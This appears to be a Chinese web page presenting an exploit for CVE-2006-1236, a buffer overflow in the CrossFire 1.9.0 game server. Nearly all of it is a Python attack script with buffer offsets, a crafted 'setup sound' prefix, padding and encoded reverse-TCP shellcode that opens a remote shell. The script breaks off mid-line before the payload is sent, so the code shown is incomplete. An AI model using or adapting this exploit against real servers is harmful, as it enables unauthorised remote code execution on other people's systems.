# CVE-2006-1236 CrossFire 1.9.0緩衝區溢出漏洞
==Exploit==
import socket
import struct
#Script by Wulfzz (Axua)
#offset to ret addr = 4368
#offset to jmp ecx = 4198
host = "127.0.0.1"
port = 13327
#linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444
shellcode = "\xbe\xc1\x25\xda\x2c\xdd\xc7\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
shellcode +="\x12\x31\x72\x12\x83\xea\xfc\x03\xb3\x2b\x38\xd9\x02\xef\x4b"
shellcode +="\xc1\x37\x4c\xe7\x6c\xb5\xdb\xe6\xc1\xdf\x16\x68\xb2\x46\x19"
shellcode +="\x56\x78\xf8\x10\xd0\x7b\x90\xdd\x22\x7c\x61\x4a\x21\x7c\x70"
shellcode +="\xd6\xac\x9d\xc2\x80\xfe\x0c\x71\xfe\xfc\x27\x94\xcd\x83\x6a"
shellcode +="\x3e\xa0\xac\xf9\xd6\x54\x9c\xd2\x44\xcc\x6b\xcf\xda\x5d\xe5"
shellcode +="\xf1\x6a\x6a\x38\x71"
prefix= "\x11(setup sound "
padding_to_ecx = "\x41" * 4198
padding_to_ret = "\x41" * (170 - len(shellcode))
jmp_ecx = struct.pack("
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容